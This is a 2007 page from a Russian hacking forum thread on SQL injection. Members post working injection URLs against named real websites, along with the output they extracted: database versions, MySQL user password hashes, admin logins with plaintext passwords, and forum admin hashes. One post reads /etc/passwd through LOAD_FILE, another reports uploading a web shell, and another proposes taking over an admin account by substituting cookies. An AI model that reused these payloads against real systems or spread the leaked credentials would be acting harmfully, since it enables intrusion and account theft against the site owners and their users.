HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 351 из 1602 « Первая < 251301341 347 348 349 350 351 352 353 354 355 3614014518511351 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 06.11.2007, 22:28
KEHT33
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459

Репутация: 79
По умолчанию
Код HTML:
http://losev-library.ru/index.php?pid=-3271+UNION+SELECT+1,concat(user,0x3b,password)+from+mysql.user+limit+1,3/*
БД скул >5

сори поправочка

Код HTML:
http://losev-library.ru/index.php?pid=-3271+UNION+SELECT+1,concat(us_id,0x3a,us_name,0x3a,us_pass,0x3a,us_perm,0x3a,us_descr)+from+us/*

админка
Код HTML:
http://losev-library.ru/nav/index.php?pid=64
залил шелл порыл дальше вообще прикол... практически везде фулл доступ....хоть папку виндоус стирай......
Последний раз редактировалось KEHT33; 07.11.2007 в 00:25..
 
Ответить с цитированием

  #2  
Старый 07.11.2007, 02:34
KEHT33
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459

Репутация: 79
По умолчанию
известный мобильный ресурс amobile.ru
Код HTML:
http://www.amobile.ru/news/news.php?nid=1880%20union%20select%201,2,3,4+from+news/*
сдесь не нашёл никакой таблицы кроме news может кто ещё что нить увидит


далее все ресурсы этого портала.

Портал мобильных развлечений
Код HTML:
http://www.funs.ru/news/news.php?nid=-100%20union%20select%201,2,concat(user,0x3a,password),4+from+mysql.user/*
Новости цифровой фотографии
Код HTML:
http://www.aphoto.ru/news/news.php?nid=-23%20union%20select%201,2,3,4/*
если админа подберём мона нахаляву покачать )
 
Ответить с цитированием

  #3  
Старый 07.11.2007, 09:52
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию
rbcob.ru - Региональная Баннерная Сеть "Омский Баннер"
Код:
http://www.rbcob.ru/news_body.php?news_id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6/*
4.0.27-standard:globalom_ob:globalom_ob@localhost
rabotaomsk.ru - работа в Омске
Код:
http://www.rabotaomsk.ru/firmnews/news_body.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*
4.0.27-standard : omck_firmnews : omck_firmnews@localhost
business.su - Деловой портал СНГ
Код:
http://www.business.su/kat.php?goroda=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50/*
4.0.27-standard : omck_firmnews : omck_firmnews@localhost
До таблиц пока не докопался...
Последний раз редактировалось fRg; 07.11.2007 в 10:53..
 
Ответить с цитированием

  #4  
Старый 07.11.2007, 12:37
ЛифчиС5СВ
Постоянный
Регистрация: 09.03.2007
Сообщений: 323
Провел на форуме:
1552920

Репутация: 369
По умолчанию
Гыгы. заюзал сплоит Don Dork'a
Links MOD v1.2.2 PHPBB

Хешики тут:
Код:
http://www.cats-house.com/links.php?t=search&search_keywords=asd&start=1+UNION+SELECT+1,username,user_password,4,5,6,7,8,9,10,11,12+FROM+phpbb_users/*
 
Ответить с цитированием

  #5  
Старый 07.11.2007, 14:35
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию
fondsk.ru - Фонд Стратегической Культуры
Код:
http://fondsk.ru/articlelist.php?section_id=-1+union+select+concat_ws(0x3a,version(),database(),user())/*
4.0.26-log:u32888:u32888@10.10.223.204

yaleherald.com
Код:
http://www.yaleherald.com/section.php?Section=2&Issue=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16/*
4.1.22-standard:yherald_com:yherald@localhost
 
Ответить с цитированием

  #6  
Старый 07.11.2007, 15:18
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию
Код:
http://blog.pmaster.net/post.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11/*
http://blog.pmaster.net/post.php?id=-1+union+select+1,char(0x3c,0x73,0x63,0x72,0x69,0x70,0x74,0x3e,0x61,0x6c,0x65,0x72,0x74,0x28,0x27,0x41,0x4e,0x54,0x49,0x43,0x48,0x41,0x54,0x27,0x29,0x3c,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x3e),3,4,5,6,7,8,9,10,11/*
 
Ответить с цитированием

  #7  
Старый 07.11.2007, 17:14
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию
http://www.level.ru/ - Интернет магазин "Левел"
Цитата:
http://www.level.ru/index.php?flt=7&folder=2689&fold=11776&fld=-22912)+union+select+1,2,concat(user,0x3a,password) ,4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user/*
Версия: 4.0.18
Юзер: root@localhost
Mysql users
Код:
root:27ad7c3446c9d3dd 
root:7e9607db022e3f71 
freenibs:565491d704013245 
for_shop_2:4ccee85a3015e2d6 
Dimano:320c67895c24eb79
Админы -
Цитата:
http://www.level.ru/index.php?flt=7&folder=2689&fold=11776&fld=-22912)+union+select+1,2,concat(login,0x3a,pass),4, 5,6,7,8,9,10,11,12,13,14,15+from+users/*
Админка (как ни странно) - http://www.level.ru/admin
Логин: user
Пасс: user

Юзеры -
Цитата:
http://www.level.ru/index.php?flt=7&folder=2689&fold=11776&fld=-22912)+union+select+1,2,concat(login,0x3a,pass),4, 5,6,7,8,9,10,11,12,13,14,15+from+clients/*
http://forum.hustleclub.ru/
На форуме стоит Инвиж, в котором присутствует древняя бага -
Цитата:
http://forum.hustleclub.ru/index.php?act=Post&CODE=02&f=42&t=728&qpid=6666666 66)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT( id,char(58),name,char(58),member_login_key),1,1,1, 1,1,1,1,1,1%20from%20ibf_members%20where%20id=1/*
Версия: 5.0.45-log
Юзверь: u8013@10.10.223.236

IPB Admin:
Login: Ajrat
Hash: 5fd53bdc4d50e4ffbf65dfc39ff93935
Через подмену куков становимся админами
p.s. Скулю может использовать только зареганный юзверь

Аналогично -
http://www.oskexpert.ru/
Цитата:
http://www.oskexpert.ru/forum/index.php?&act=Post&CODE=02&f=2&t=598&qpid=6666666 66)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT( id,char(58),name,char(58),member_login_key),1,1,1, 1,1,1,1,1,1%20from%20ibf_members%20WHERE%20id=1%20/*
Версия: 4.1.21-log
Юзверь: Uwww3191S@localhost

IPB Admin:
Login: admin
Hash: ff6f02484f67bc7990c6bd2eee3f415c
 
Ответить с цитированием

  #8  
Старый 07.11.2007, 19:27
KEHT33
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459

Репутация: 79
По умолчанию
сайт мобильных телефонов http://www.interstar.ua/

Код HTML:
http://www.interstar.ua/mobile/?day_begin=08&mounth_begin=10&year_begin=2007&day_end=07&mounth_end=11&year_end=2007&main_menu=5&id_show=-5403%20union%20select%20login,2,3,4,5,password,7,8+from+users+limit+0,1/*
Другая таблица

Код HTML:
http://www.interstar.ua/mobile/?day_begin=08&mounth_begin=10&year_begin=2007&day_end=07&mounth_end=11&year_end=2007&main_menu=5&id_show=-5403%20union%20select%20login_member,2,3,4,5,concat(password_member,0x3b,email_member),7,8+from+members+limit+1,1/*
 
Ответить с цитированием

  #9  
Старый 07.11.2007, 21:21
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию
aim-mia.de
Код:
http://www.aim-mia.de/categories.php?catid=-1+union+select+concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71)),aes_decrypt(aes_encrypt(user(),0x71),0x71)/*
85 таблиц:
Код:
http://www.aim-mia.de/categories.php?catid=-1+union+select+aes_decrypt(aes_encrypt(table_name,0x71),0x71),2+from+information_schema.tables+limit+84,1/*
root:
Код:
http://www.aim-mia.de/categories.php?catid=-1+union+select+aes_decrypt(aes_encrypt(USER,0x71),0x71),aes_decrypt(aes_encrypt(PASSWORD,0x71),0x71)+from+MYSQL.USER+limit+0,1/*
ROOT:*980166F60E2FA650E7930113CDCA43D3BA726973
Интересные таблицы: JOS_USERS и ADMINBLOCK (есть и другие...)
 
Ответить с цитированием

  #10  
Старый 08.11.2007, 00:37
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217

Репутация: 2097
По умолчанию
logobook.ru
Код:
http://www.logobook.ru/prod_show.php?object_uid=11122009%20or%201=(select%20db_name())--
version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
system_user: sa
db_name: Images


emigranty.ru
Код:
http://www.emigranty.ru/letters.php?lid=-38+union+select+1,2,concat_ws(char(58),version(),user(),database())+--+
5.0.22-Debian_0ubuntu6.06.5-log:emigrantyr@uvirt4.active24.cz:emigrantyr

/etc/passwd
Код:
http://www.emigranty.ru/letters.php?lid=-38+union+select+1,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),concat_ws(char(58),version(),user(),database())+--+
Код:
http://www.emigranty.ru/letters.php?lid=-38+union+select+1,2,concat_ws(char(58),uLogin,uPass)+from+emg_user+--+
login: rdm
password: rdm
http://www.emigranty.ru/admin/
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 
Ответить с цитированием
Ответ
Страница 351 из 1602 « Первая < 251301341 347 348 349 350 351 352 353 354 355 3614014518511351 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ